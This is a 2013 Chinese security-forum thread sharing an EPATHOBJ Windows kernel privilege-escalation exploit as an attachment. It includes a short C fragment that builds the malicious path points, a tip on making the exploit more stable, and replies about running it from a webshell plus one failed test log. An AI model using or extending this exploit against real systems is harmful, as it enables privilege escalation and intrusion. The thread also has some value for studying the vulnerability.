首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. 编程技术
    3. 发新帖
[原创]EPATHOBJ Exploit Source code
发表于: 2013-7-13 11:51 8260

[原创]EPATHOBJ Exploit Source code

boywhp 活跃值
12
2013-7-13 11:51
8260

利用不是太稳定,当然虚拟机测试还不错,具体见代码,编译的时候需要关闭alsr
        for (PointNum = 0; PointNum < MAX_POLYPOINTS; PointNum++) {
#ifdef _WIN64
                Points[PointNum].x      = (ULONG)(PathRecord) >> 4;
                Points[PointNum].y      = 0;//(ULONG)(PathRecord) >> 4;
#else
                Points[PointNum].x      = (ULONG)(PathRecord) >> 4;
                Points[PointNum].y      = (ULONG)(PathRecord) >> 4;
#endif
                PointTypes[PointNum]    = PT_BEZIERTO;
        }

这里可以修改为
Points[PointNum].x =  Points[PointNum].y = 1,然后再修改相关代码会更稳妥

pathExp.rar


[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

上传的附件:
收藏
免费 5
支持
分享
最新回复 (9)
RootSuLe
雪    币: 601
活跃值: (256)
能力值: ( LV11,RANK:190 )
在线值:
发帖
回帖
粉丝
私信
2
LZ有没有研究下在webshell下怎么搞,困了好几天了
2013-7-13 12:04
0
boywhp
雪    币: 1233
活跃值: (907)
能力值: ( LV12,RANK:750 )
在线值:
发帖
回帖
粉丝
私信
3
直接将你的功能代码写到exploite里面即可。
2013-7-13 12:47
0
dayang
雪    币: 220
活跃值: (711)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
4
WEBSHELL下,不好用
2013-7-13 21:17
0
nObele
雪    币: 1705
活跃值: (1665)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
5
都有执行exp的权限了,干点啥不好
2013-7-13 21:30
0
uing
雪    币: 85
活跃值: (87)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
6
哪个权限的账号没执行EXP权限? 说点啥不好...
2013-7-14 11:16
0
nObele
雪    币: 1705
活跃值: (1665)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
7
楼上实际操作过吗?怎么操作的?
拿到webshell正常的管理员给你执行exe的我没见过,除非人家压根不关注服务器数据
2013-7-14 13:49
0
boywhp
雪    币: 1233
活跃值: (907)
能力值: ( LV12,RANK:750 )
在线值:
发帖
回帖
粉丝
私信
8
要我怎么说好呢?webshell下不会用就没用,会用就有用,其它无可奉告
2013-7-15 08:19
0
alan113
雪    币: 238
活跃值: (178)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
9
2k3 en x64
用户:users组
测试返回结果

C:\test>pathExploit.exe
ntos:ntoskrnl.exe->01000000
error reload os kernel
2013-7-15 11:06
0
zyicai
雪    币: 437
活跃值: (78)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
10
东西不错
2013-7-15 11:30
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回
//